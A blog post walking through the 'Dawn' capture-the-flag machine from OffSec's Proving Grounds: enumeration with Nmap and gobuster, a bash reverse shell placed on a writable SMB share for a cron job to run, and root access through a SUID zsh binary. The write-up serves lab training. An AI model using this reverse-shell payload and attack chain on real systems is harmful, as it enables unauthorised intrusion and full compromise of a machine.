Proving Grounds - Dawn Writeup

May 31, 2026

ctf
linux

This lab demonstrates the exploitation of a misconfigured SMB share and scheduled cron jobs to achieve remote code execution. By uploading malicious files to an open SMB share, the attacker leverages a cron job to execute them. Privilege escalation is accomplished through a misconfigured SUID binary, zsh, which provides root access.

This is a walkthrough of the machine Dawn from OffSec's Proving Grounds Play labs.

Machine information:

  • Level: Easy
  • Community rating: Intermediate
  • Flags: 2
  • OS: Linux
  • Vector: Samba, SUID misconfiguration

Nmap

sudo nmap -A --open -sV -sC -v -p- <IP>

Starting off with an Nmap scan, we discover the following open ports:

  • 80 - HTTP
  • 139/445 - Samba
  • 3306 - MySQL

Webapp

The web application on port 80 does not reveal anything interesting, displaying a generic "under construction" page:

To dig deeper, we will enumerate it using gobuster:

gobuster dir -u http://<IP>/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 64

We get a hit on /logs, which is an open directory containing four log files.

The only accessible log file is management.log, so we can download it to take a closer look.

wget http://<IP>/logs/management.log

The file contains logs from pspy - a process monitoring tool. Scrolling down a bit, we discover what appears to be a cronjob executing the following commands every minute:

Samba

We will briefly take a detour to enumerate Samba, first listing what shares are available using smbclient:

smbclient -L \\\\<IP>\\

We can see the same share - ITDEPT, which the cronjob executes product-control and web-control from.

Initial access

Since the cronjob will execute these files, and we have access to the share, we will start off by creating a simple reverse shell.

web-control:

#!/bin/bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

Next, we will start a listener to catch the shell:

nc -lvnp <PORT>

And finally, we will connect to the ITDEPT share, and upload web-control:

smbclient \\\\<IP>\\ITDEPT

put web-control

Within a minute, we receive a shell as www-data, and can read the first local.txt flag:

Privilege escalation

Using manual enumeration, looking for executables with the SUID bit set, we find /usr/bin/zsh:

find / -perm -u=s -type f 2>/dev/null

We can abuse this to escalate privileges by running the following, which provides us with a root shell to finally read the second proof.txt flag:

zsh

Related Articles
Proving Grounds - FunboxEasyEnum Writeup
May 31, 2026
ctf
linux
Proving Grounds - Monitoring Writeup
May 30, 2026
ctf
linux
In this lab, we exploit an authenticated remote code execution vulnerability in the Nagios XI monitoring software. The application is misconfigured to run with root privileges, allowing us to escalate immediately to root once the vulnerability is exploited.
Proving Grounds - Sar Writeup
May 29, 2026
ctf
linux
This lab demonstrates how to exploit a remote code execution (RCE) vulnerability in a vulnerable version of sar2html. By discovering the application via the robots.txt file and leveraging the RCE, you gain an initial shell. Privilege escalation is achieved by exploiting a cronjob misconfiguration that allows overwriting a custom .sh script executed as root.
Karam Chatra
Blog
Karam Chatra
Junior Threat Intelligence Analyst
Navigation
HomeBlogDisclaimer
© 2026 Karam Chatra.